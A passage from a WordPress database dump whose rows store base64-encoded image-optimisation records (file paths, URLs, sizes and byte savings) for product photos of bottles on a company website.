NvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvOC1vei1Ecm9wcGVyLUJvdHRsZS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6OTksInRpbWUiOjE0ODM1ODc3MjcsImlkIjozNjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC84LW96LURyb3BwZXItQm90dGxlLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvOC1vei1Ecm9wcGVyLUJvdHRsZS0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzgtb3otRHJvcHBlci1Cb3R0bGUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3MjksImlkIjozNjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC84LW96LURyb3BwZXItQm90dGxlLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvOC1vei1Ecm9wcGVyLUJvdHRsZS0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzgtb3otRHJvcHBlci1Cb3R0bGUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3MzIsImlkIjozNjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC84LW96LURyb3BwZXItQm90dGxlLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvOC1vei1Ecm9wcGVyLUJvdHRsZS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzgtb3otRHJvcHBlci1Cb3R0bGUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3MzQsImlkIjozNjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC84LW96LURyb3BwZXItQm90dGxlLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvOC1vei1Ecm9wcGVyLUJvdHRsZS00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzgtb3otRHJvcHBlci1Cb3R0bGUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3MzcsImlkIjozNjZ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC84LW96LURyb3BwZXItQm90dGxlLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvOC1vei1Ecm9wcGVyLUJvdHRsZS02MDB4NjAwLmpwZyIsIndpZHRoIjoiNjAwIiwiaGVpZ2h0IjoiNjAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzgtb3otRHJvcHBlci1Cb3R0bGUtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3NDAsImlkIjozNjZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30247, 365, 'wpfc_optimisation_reduction', '24842'); 
INSERT INTO `wp_postmeta` VALUES (30248, 365, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS5qcGciLCJ3aWR0aCI6Mjk4OCwiaGVpZ2h0IjozNjk0LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUuanBnIiwicmVkdWN0aW9uIjoyNDc1MSwidGltZSI6MTQ4MzU4Nzc1MSwiaWQiOiIzNjUifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC80LW96LUJvdHRsZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Nzc1MywiaWQiOjM2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS02NDd4ODAwLmpwZyIsIndpZHRoIjo2NDcsImhlaWdodCI6ODAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTY0N3g4MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtNjQ3eDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3NTYsImlkIjozNjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtNzY4eDk0OS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjk0OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS03Njh4OTQ5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzQtb3otQm90dGxlLTc2OHg5NDkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NzYwLCJpZCI6MzY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTEyOTR4MTYwMC5qcGciLCJ3aWR0aCI6MTI5NCwiaGVpZ2h0IjoxNjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTEyOTR4MTYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC80LW96LUJvdHRsZS0xMjk0eDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NzYzLCJpZCI6MzY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC80LW96LUJvdHRsZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Nzc2NiwiaWQiOjM2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3NjgsImlkIjozNjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzQtb3otQm90dGxlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3NzcxLCJpZCI6MzY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC80LW96LUJvdHRsZS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4Nzc3NCwiaWQiOjM2NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC80LW96LUJvdHRsZS0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NzgsInRpbWUiOjE0ODM1ODc3NzYsImlkIjozNjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3NzksImlkIjozNjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3ODEsImlkIjozNjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3ODQsImlkIjozNjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3ODcsImlkIjozNjV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC80LW96LUJvdHRsZS02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzQtb3otQm90dGxlLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvNC1vei1Cb3R0bGUtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc3OTAsImlkIjozNjV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30249, 364, 'wpfc_optimisation_reduction', '42756'); 
INSERT INTO `wp_postmeta` VALUES (30250, 364, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUuanBnIiwid2lkdGgiOjI5ODgsImhlaWdodCI6MzAyOSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUuanBnIiwicmVkdWN0aW9uIjo0MjQ0MywidGltZSI6MTQ4MzU4NzgwMCwiaWQiOiIzNjQifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzgwMywiaWQiOjM2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTc4OXg4MDAuanBnIiwid2lkdGgiOjc4OSwiaGVpZ2h0Ijo4MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS03ODl4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtNzg5eDgwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4MDYsImlkIjozNjR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS03Njh4Nzc5LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6Nzc5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtNzY4eDc3OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTc2OHg3NzkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3ODA5LCJpZCI6MzY0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtMTU3OHgxNjAwLmpwZyIsIndpZHRoIjoxNTc4LCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0xNTc4eDE2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0xNTc4eDE2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg3ODEyLCJpZCI6MzY0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4NzgxNSwiaWQiOjM2NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC8yLW96LURyb3BwZXItQm90dGxlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvMi1vei1Ecm9wcGVyLUJvdHRsZS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcLzItb3otRHJvcHBlci1Cb3R0bGUtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODc4MTcsImlkIjozNjR9LHsiZmlsZ